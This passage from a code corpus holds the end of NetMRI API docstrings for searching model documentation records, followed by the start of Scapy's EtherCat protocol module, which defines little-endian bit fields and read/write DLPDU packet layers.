:param query: This value will be matched against model docs, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: category, created_at, description, hidden_ind, history_support, id, java_api_ind, model_name, perl_api_ind, table_name, title, updated_at.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_docs: An array of the ModelDoc objects that match the specified input criteria.
:rtype model_docs: Array of ModelDoc
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available model docs matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: category, created_at, description, hidden_ind, history_support, id, java_api_ind, model_name, perl_api_ind, table_name, title, updated_at.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_category: The operator to apply to the field category. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. category: The category of this model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_category: If op_category is specified, the field named in this input will be compared to the value in category using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_category must be specified if op_category is specified.
:type val_f_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_category: If op_category is specified, this value will be compared to the value in category using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_category must be specified if op_category is specified.
:type val_c_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_created_at: The operator to apply to the field created_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. created_at: The date and time the record was initially created in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_created_at: If op_created_at is specified, the field named in this input will be compared to the value in created_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_created_at must be specified if op_created_at is specified.
:type val_f_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_created_at: If op_created_at is specified, this value will be compared to the value in created_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_created_at must be specified if op_created_at is specified.
:type val_c_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_description: The operator to apply to the field description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. description: The description of this model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_description: If op_description is specified, the field named in this input will be compared to the value in description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_description must be specified if op_description is specified.
:type val_f_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_description: If op_description is specified, this value will be compared to the value in description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_description must be specified if op_description is specified.
:type val_c_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_hidden_ind: The operator to apply to the field hidden_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. hidden_ind: A flag indicating if model is hidden For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_hidden_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_hidden_ind: If op_hidden_ind is specified, the field named in this input will be compared to the value in hidden_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_hidden_ind must be specified if op_hidden_ind is specified.
:type val_f_hidden_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_hidden_ind: If op_hidden_ind is specified, this value will be compared to the value in hidden_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_hidden_ind must be specified if op_hidden_ind is specified.
:type val_c_hidden_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_history_support: The operator to apply to the field history_support. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. history_support: History support. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_history_support: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_history_support: If op_history_support is specified, the field named in this input will be compared to the value in history_support using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_history_support must be specified if op_history_support is specified.
:type val_f_history_support: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_history_support: If op_history_support is specified, this value will be compared to the value in history_support using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_history_support must be specified if op_history_support is specified.
:type val_c_history_support: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The internal NetMRI identifier for this model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_java_api_ind: The operator to apply to the field java_api_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. java_api_ind: A flag indicating if model is in java API For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_java_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_java_api_ind: If op_java_api_ind is specified, the field named in this input will be compared to the value in java_api_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_java_api_ind must be specified if op_java_api_ind is specified.
:type val_f_java_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_java_api_ind: If op_java_api_ind is specified, this value will be compared to the value in java_api_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_java_api_ind must be specified if op_java_api_ind is specified.
:type val_c_java_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_model_name: The operator to apply to the field model_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. model_name: The name of model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_model_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_model_name: If op_model_name is specified, the field named in this input will be compared to the value in model_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_model_name must be specified if op_model_name is specified.
:type val_f_model_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_model_name: If op_model_name is specified, this value will be compared to the value in model_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_model_name must be specified if op_model_name is specified.
:type val_c_model_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_perl_api_ind: The operator to apply to the field perl_api_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. perl_api_ind: A flag indicating if model is in perl API For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_perl_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_perl_api_ind: If op_perl_api_ind is specified, the field named in this input will be compared to the value in perl_api_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_perl_api_ind must be specified if op_perl_api_ind is specified.
:type val_f_perl_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_perl_api_ind: If op_perl_api_ind is specified, this value will be compared to the value in perl_api_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_perl_api_ind must be specified if op_perl_api_ind is specified.
:type val_c_perl_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_table_name: The operator to apply to the field table_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. table_name: The name of database table where model records are stored. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_table_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_table_name: If op_table_name is specified, the field named in this input will be compared to the value in table_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_table_name must be specified if op_table_name is specified.
:type val_f_table_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_table_name: If op_table_name is specified, this value will be compared to the value in table_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_table_name must be specified if op_table_name is specified.
:type val_c_table_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_title: The operator to apply to the field title. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. title: The title of model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_title: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_title: If op_title is specified, the field named in this input will be compared to the value in title using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_title must be specified if op_title is specified.
:type val_f_title: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_title: If op_title is specified, this value will be compared to the value in title using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_title must be specified if op_title is specified.
:type val_c_title: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: The date and time the record was last modified in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified.
:type val_f_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified.
:type val_c_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each ModelDoc. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_docs: An array of the ModelDoc objects that match the specified input criteria.
:rtype model_docs: Array of ModelDoc
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs) | unknown | codeparrot/codeparrot-clean | ||
# scapy.contrib.description = EtherCat
# scapy.contrib.status = loads
"""
EtherCat automation protocol
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:author: Thomas Tannhaeuser, hecke@naberius.de
:license: GPLv2
This module is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
:description:
This module provides Scapy layers for the EtherCat protocol.
normative references:
- IEC 61158-3-12 - data link service and topology description
- IEC 61158-4-12 - protocol specification
Currently only read/write services as defined in IEC 61158-4-12,
sec. 5.4 are supported.
:TODO:
- Mailbox service (sec. 5.5)
- Network variable service (sec. 5.6)
:NOTES:
- EtherCat frame type defaults to TYPE-12-PDU (0x01)
- padding for minimum frame size is added automatically
"""
import struct
from scapy.compat import raw
from scapy.error import log_runtime, Scapy_Exception
from scapy.fields import BitField, ByteField, LEShortField, FieldListField, \
LEIntField, FieldLenField, _EnumField, EnumField
from scapy.layers.l2 import Ether, Dot1Q
import scapy.modules.six as six
from scapy.packet import bind_layers, Packet, Padding
'''
EtherCat uses some little endian bitfields without alignment to any common boundaries. # noqa: E501
See https://github.com/secdev/scapy/pull/569#issuecomment-295419176 for a short explanation # noqa: E501
why the following field definitions are necessary.
'''
class LEBitFieldSequenceException(Scapy_Exception):
    """
    Raised when a LEBitField-based field set is malformed, e.g. when a
    LEBitField is mixed with BitField/other field types or the set does
    not end on an octet boundary (thrown by EtherCat structure tests).
    """
    pass
class LEBitField(BitField):
    """
    a little endian version of the BitField

    Successive LEBitField instances form a *bit field set*.  While the set
    is incomplete (does not yet end on an octet boundary) addfield/getfield
    pass an accumulator tuple along instead of a raw string; the whole set
    is serialized/dissected at once by the field that completes an octet.
    """
    def _check_field_type(self, pkt, index):
        """
        check if the field addressed by given index relative to this field
        shares type of this field so we can catch a mix of LEBitField
        and BitField/other types
        """
        my_idx = pkt.fields_desc.index(self)
        try:
            next_field = pkt.fields_desc[my_idx + index]
            if type(next_field) is not LEBitField and \
                    next_field.__class__.__base__ is not LEBitField:
                raise LEBitFieldSequenceException('field after field {} must '
                                                  'be of type LEBitField or '
                                                  'derived classes'.format(self.name))  # noqa: E501
        except IndexError:
            # no more fields -> error
            raise LEBitFieldSequenceException('Missing further LEBitField '
                                              'based fields after field '
                                              '{} '.format(self.name))

    def addfield(self, pkt, s, val):
        """
        :param pkt: packet instance the raw string s and field belongs to
        :param s: raw string representing the frame
        :param val: value
        :return: final raw string, tuple (s, bitsdone, data) if in between bit field  # noqa: E501

        as we don't know the final size of the full bitfield we need to accumulate the data.  # noqa: E501
        if we reach a field that ends at a octet boundary, we build the whole string  # noqa: E501
        """
        # a 4-tuple means a prior LEBitField already started this set
        if type(s) is tuple and len(s) == 4:
            s, bitsdone, data, _ = s
            self._check_field_type(pkt, -1)
        else:
            # this is the first bit field in the set
            bitsdone = 0
            data = []
        bitsdone += self.size
        data.append((self.size, self.i2m(pkt, val)))
        if bitsdone % 8:
            # somewhere in between bit 0 .. 7 - next field should add more bits...  # noqa: E501
            self._check_field_type(pkt, 1)
            return s, bitsdone, data, type(LEBitField)
        else:
            # octet boundary reached - emit the accumulated set, little endian
            data.reverse()
            octet = 0
            remaining_len = 8
            octets = bytearray()
            for size, val in data:
                while True:
                    if size < remaining_len:
                        # field fits inside the current octet with room left
                        remaining_len = remaining_len - size
                        octet |= val << remaining_len
                        break
                    elif size > remaining_len:
                        # take the leading bits and add them to octet
                        size -= remaining_len
                        octet |= val >> size
                        octets = struct.pack('!B', octet) + octets
                        octet = 0
                        remaining_len = 8
                        # delete all consumed bits
                        # TODO: do we need to add a check for bitfields > 64 bits to catch overruns here?  # noqa: E501
                        val &= ((2 ** size) - 1)
                        continue
                    else:
                        # size == remaining len
                        octet |= val
                        octets = struct.pack('!B', octet) + octets
                        octet = 0
                        remaining_len = 8
                        break
            return s + octets

    def getfield(self, pkt, s):
        """
        extract data from raw str

        collect all instances belonging to the bit field set.
        if we reach a field that ends at a octet boundary, dissect the whole bit field at once  # noqa: E501

        :param pkt: packet instance the field belongs to
        :param s: raw string representing the frame -or- tuple containing raw str, number of bits and array of fields  # noqa: E501
        :return: tuple containing raw str, number of bits and array of fields -or- remaining raw str and value of this  # noqa: E501
        """
        if type(s) is tuple and len(s) == 3:
            s, bits_in_set, fields = s
        else:
            bits_in_set = 0
            fields = []
        bits_in_set += self.size
        fields.append(self)
        if bits_in_set % 8:
            # we are in between the bitfield
            return (s, bits_in_set, fields), None
        else:
            cur_val = 0
            cur_val_bit_idx = 0
            this_val = 0
            field_idx = 0
            field = fields[field_idx]
            field_required_bits = field.size
            idx = 0
            s = bytearray(s)
            bf_total_byte_length = bits_in_set // 8
            # walk the raw octets and distribute their bits over the
            # collected fields, little endian
            for octet in s[0:bf_total_byte_length]:
                idx += 1
                octet_bits_left = 8
                while octet_bits_left:
                    if field_required_bits == octet_bits_left:
                        # whole field fits into remaining bits
                        # as this also signals byte-alignment this should exit the inner and outer loop  # noqa: E501
                        cur_val |= octet << cur_val_bit_idx
                        pkt.fields[field.name] = cur_val
                        '''
                        TODO: check if do_dessect() needs a non-None check for assignment to raw_packet_cache_fields  # noqa: E501

                        setfieldval() is evil as it sets raw_packet_cache_fields to None - but this attribute  # noqa: E501
                        is accessed in do_dissect() without checking for None... exception is caught and the  # noqa: E501
                        user ends up with a layer decoded as raw...

                        pkt.setfieldval(field.name, int(bit_str[:field.size], 2))   # noqa: E501
                        '''
                        octet_bits_left = 0
                        this_val = cur_val
                    elif field_required_bits < octet_bits_left:
                        # pick required bits
                        cur_val |= (octet & ((2 ** field_required_bits) - 1)) << cur_val_bit_idx  # noqa: E501
                        pkt.fields[field.name] = cur_val
                        # remove consumed bits
                        octet >>= field_required_bits
                        octet_bits_left -= field_required_bits
                        # and move to the next field
                        field_idx += 1
                        field = fields[field_idx]
                        field_required_bits = field.size
                        cur_val_bit_idx = 0
                        cur_val = 0
                    elif field_required_bits > octet_bits_left:
                        # take remaining bits
                        cur_val |= octet << cur_val_bit_idx
                        cur_val_bit_idx += octet_bits_left
                        field_required_bits -= octet_bits_left
                        octet_bits_left = 0
            return s[bf_total_byte_length:], this_val
class LEBitFieldLenField(LEBitField):
    """
    LEBitField variant that derives its value from the length/count of
    another field (same contract as FieldLenField, little endian bits).
    """
    __slots__ = ["length_of", "count_of", "adjust"]

    def __init__(self, name, default, size, length_of=None, count_of=None, adjust=lambda pkt, x: x):  # noqa: E501
        LEBitField.__init__(self, name, default, size)
        self.length_of = length_of
        self.count_of = count_of
        self.adjust = adjust

    def i2m(self, pkt, x):
        # delegate to FieldLenField.i2m; on PY2 the unbound method must be
        # unwrapped via __func__ so it accepts an LEBitFieldLenField as self
        return (FieldLenField.i2m.__func__ if six.PY2 else FieldLenField.i2m)(self, pkt, x)  # noqa: E501
class LEBitEnumField(LEBitField, _EnumField):
    """
    Little-endian bit field rendered through an enum mapping.

    A negative ``size`` selects reversed bit order, mirroring the
    behaviour of BitEnumField.
    """
    __slots__ = EnumField.__slots__

    def __init__(self, name, default, size, enum):
        _EnumField.__init__(self, name, default, enum)
        if size < 0:
            self.rev = True
            self.size = -size
        else:
            self.rev = False
            self.size = size
################################################
# DLPDU structure definitions (read/write PDUs)
################################################
# values of the 'c' (circulating frame) bit in a Type12 DLPDU header
ETHERCAT_TYPE_12_CIRCULATING_FRAME = {
    0x00: 'FRAME-NOT-CIRCULATING',
    0x01: 'FRAME-CIRCULATED-ONCE'
}

# values of the 'next' bit: does another Type12 DLPDU follow this one?
ETHERCAT_TYPE_12_NEXT_FRAME = {
    0x00: 'LAST-TYPE12-PDU',
    0x01: 'TYPE12-PDU-FOLLOWS'
}
class EtherCatType12DLPDU(Packet):
    """
    Type12 message base class

    Concrete read/write DLPDUs derive from this class and prepend their
    command byte to one of the *_ADDRESSING_DESC field templates below.
    """

    def post_build(self, pkt, pay):
        """
        set next attr automatically if not set explicitly by user

        :param pkt: raw string containing the current layer
        :param pay: raw string containing the payload
        :return: <new current layer> + payload
        """
        data_len = len(self.data)
        # 'len' field is 11 bit wide -> max 2047 data bytes
        if data_len > 2047:
            raise ValueError('payload size {} exceeds maximum length {} '
                             'of data size.'.format(data_len, 2047))

        if self.next is not None:
            # user set the flag explicitly - honor it
            has_next = True if self.next else False
        else:
            # otherwise infer it from the presence of a payload
            if pay:
                has_next = True
            else:
                has_next = False
        # the 'next' flag is the top bit of octet 7 of the DLPDU header
        if has_next:
            next_flag = bytearray([pkt[7] | 0b10000000])
        else:
            next_flag = bytearray([pkt[7] & 0b01111111])
        return pkt[:7] + next_flag + pkt[8:] + pay

    def guess_payload_class(self, payload):
        # the first payload byte is the cmd code of the following DLPDU
        try:
            dlpdu_type = payload[0]
            return EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[dlpdu_type]
        except KeyError:
            log_runtime.error(
                '{}.guess_payload_class() - unknown or invalid '
                'DLPDU type'.format(self.__class__.__name__))
            return Packet.guess_payload_class(self, payload)

    # structure templates lacking leading cmd-attribute
    PHYSICAL_ADDRESSING_DESC = [
        ByteField('idx', 0),
        LEShortField('adp', 0),
        LEShortField('ado', 0),
        LEBitFieldLenField('len', None, 11, count_of='data'),
        LEBitField('_reserved', 0, 3),
        LEBitEnumField('c', 0, 1, ETHERCAT_TYPE_12_CIRCULATING_FRAME),
        LEBitEnumField('next', None, 1, ETHERCAT_TYPE_12_NEXT_FRAME),
        LEShortField('irq', 0),
        FieldListField('data', [], ByteField('', 0x00),
                       count_from=lambda pkt: pkt.len),
        LEShortField('wkc', 0)
    ]

    BROADCAST_ADDRESSING_DESC = PHYSICAL_ADDRESSING_DESC

    LOGICAL_ADDRESSING_DESC = [
        ByteField('idx', 0),
        LEIntField('adr', 0),
        LEBitFieldLenField('len', None, 11, count_of='data'),
        LEBitField('_reserved', 0, 3),
        LEBitEnumField('c', 0, 1, ETHERCAT_TYPE_12_CIRCULATING_FRAME),
        LEBitEnumField('next', None, 1, ETHERCAT_TYPE_12_NEXT_FRAME),
        LEShortField('irq', 0),
        FieldListField('data', [], ByteField('', 0x00),
                       count_from=lambda pkt: pkt.len),
        LEShortField('wkc', 0)
    ]
################
# read messages
################
class EtherCatAPRD(EtherCatType12DLPDU):
    """
    Auto Increment Physical Read (APRD) DLPDU,
    see IEC 61158-5-12, sec. 5.4.1.2 tab. 14 / p. 32
    """
    fields_desc = ([ByteField('_cmd', 0x01)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatFPRD(EtherCatType12DLPDU):
    """
    Configured address physical read (FPRD) DLPDU,
    see IEC 61158-5-12, sec. 5.4.1.3 tab. 15 / p. 33
    """
    fields_desc = ([ByteField('_cmd', 0x04)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatBRD(EtherCatType12DLPDU):
    """
    Broadcast read (BRD) DLPDU,
    see IEC 61158-5-12, sec. 5.4.1.4 tab. 16 / p. 34
    """
    fields_desc = ([ByteField('_cmd', 0x07)] +
                   EtherCatType12DLPDU.BROADCAST_ADDRESSING_DESC)
class EtherCatLRD(EtherCatType12DLPDU):
    """
    Logical read (LRD) DLPDU,
    see IEC 61158-5-12, sec. 5.4.1.5 tab. 17 / p. 36
    """
    fields_desc = ([ByteField('_cmd', 0x0a)] +
                   EtherCatType12DLPDU.LOGICAL_ADDRESSING_DESC)
#################
# write messages
#################
class EtherCatAPWR(EtherCatType12DLPDU):
    """
    Auto Increment Physical Write (APWR) DLPDU,
    see IEC 61158-5-12, sec. 5.4.2.2 tab. 18 / p. 37
    """
    fields_desc = ([ByteField('_cmd', 0x02)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatFPWR(EtherCatType12DLPDU):
    """
    Configured address physical write (FPWR) DLPDU,
    see IEC 61158-5-12, sec. 5.4.2.3 tab. 19 / p. 38
    """
    fields_desc = ([ByteField('_cmd', 0x05)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatBWR(EtherCatType12DLPDU):
    """
    BWR - Broadcast write (IEC 61158-5-12, sec. 5.4.2.4 tab. 20 / p. 39)
    """
    fields_desc = [ByteField('_cmd', 0x08)] + \
        EtherCatType12DLPDU.BROADCAST_ADDRESSING_DESC
class EtherCatLWR(EtherCatType12DLPDU):
    """
    Logical write (LWR) DLPDU,
    see IEC 61158-5-12, sec. 5.4.2.5 tab. 21 / p. 40
    """
    fields_desc = ([ByteField('_cmd', 0x0b)] +
                   EtherCatType12DLPDU.LOGICAL_ADDRESSING_DESC)
######################
# read/write messages
######################
class EtherCatAPRW(EtherCatType12DLPDU):
    """
    Auto Increment Physical Read Write (APRW) DLPDU,
    see IEC 61158-5-12, sec. 5.4.3.1 tab. 22 / p. 41
    """
    fields_desc = ([ByteField('_cmd', 0x03)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatFPRW(EtherCatType12DLPDU):
    """
    Configured address physical read write (FPRW) DLPDU,
    see IEC 61158-5-12, sec. 5.4.3.2 tab. 23 / p. 43
    """
    fields_desc = ([ByteField('_cmd', 0x06)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatBRW(EtherCatType12DLPDU):
    """
    Broadcast read write (BRW) DLPDU,
    see IEC 61158-5-12, sec. 5.4.3.3 tab. 24 / p. 39
    """
    fields_desc = ([ByteField('_cmd', 0x09)] +
                   EtherCatType12DLPDU.BROADCAST_ADDRESSING_DESC)
class EtherCatLRW(EtherCatType12DLPDU):
    """
    Logical read write (LRW) DLPDU,
    see IEC 61158-5-12, sec. 5.4.3.4 tab. 25 / p. 45
    """
    fields_desc = ([ByteField('_cmd', 0x0c)] +
                   EtherCatType12DLPDU.LOGICAL_ADDRESSING_DESC)
class EtherCatARMW(EtherCatType12DLPDU):
    """
    Auto increment physical read multiple write (ARMW) DLPDU,
    see IEC 61158-5-12, sec. 5.4.3.5 tab. 26 / p. 46
    """
    fields_desc = ([ByteField('_cmd', 0x0d)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCatFRMW(EtherCatType12DLPDU):
    """
    Configured address physical read multiple write (FRMW) DLPDU,
    see IEC 61158-5-12, sec. 5.4.3.6 tab. 27 / p. 47
    """
    fields_desc = ([ByteField('_cmd', 0x0e)] +
                   EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC)
class EtherCat(Packet):
    """
    Common EtherCat header layer
    """
    # frame geometry constants, all in bytes
    ETHER_HEADER_LEN = 14
    ETHER_FSC_LEN = 4
    ETHER_FRAME_MIN_LEN = 64
    ETHERCAT_HEADER_LEN = 2

    FRAME_TYPES = {
        0x01: 'TYPE-12-PDU',
        0x04: 'NETWORK-VARIABLES',
        0x05: 'MAILBOX'
    }

    fields_desc = [
        LEBitField('length', 0, 11),
        LEBitField('_reserved', 0, 1),
        LEBitField('type', 0, 4),
    ]

    # cmd code (first byte of a DLPDU) -> DLPDU layer class
    ETHERCAT_TYPE12_DLPDU_TYPES = {
        0x01: EtherCatAPRD,
        0x04: EtherCatFPRD,
        0x07: EtherCatBRD,
        0x0a: EtherCatLRD,
        0x02: EtherCatAPWR,
        0x05: EtherCatFPWR,
        0x08: EtherCatBWR,
        0x0b: EtherCatLWR,
        0x03: EtherCatAPRW,
        0x06: EtherCatFPRW,
